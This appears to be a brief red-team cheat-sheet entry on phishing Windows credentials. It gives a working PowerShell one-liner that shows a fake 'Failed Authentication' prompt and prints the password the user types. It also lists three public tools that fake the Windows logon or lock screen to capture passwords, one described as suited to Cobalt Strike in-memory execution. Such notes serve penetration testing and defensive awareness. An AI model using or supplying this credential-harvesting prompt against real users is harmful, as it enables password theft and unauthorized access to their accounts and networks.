PowerShell script:
powershell "$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password"
Link: https://github.com/bitsadmin/fakelogonscreen
FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user's password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk.
Link: https://github.com/Pickfordmatt/SharpLocker
SharpLocker helps get current user credentials by popping a fake Windows lock screen, all output is sent to Console which works perfect for Cobalt Strike. It is written in C# to allow for direct execution via memory injection using techniques such as execute-assembly found in Cobalt Strike or others
Link: https://github.com/Dviros/CredsLeaker
This script used to display a powershell credentials box asked the user for credentials. However, That was highly noticeable. Now it's time to utilize Windows Security popup!
https://pentestlab.blog/2020/03/02/phishing-windows-credentials/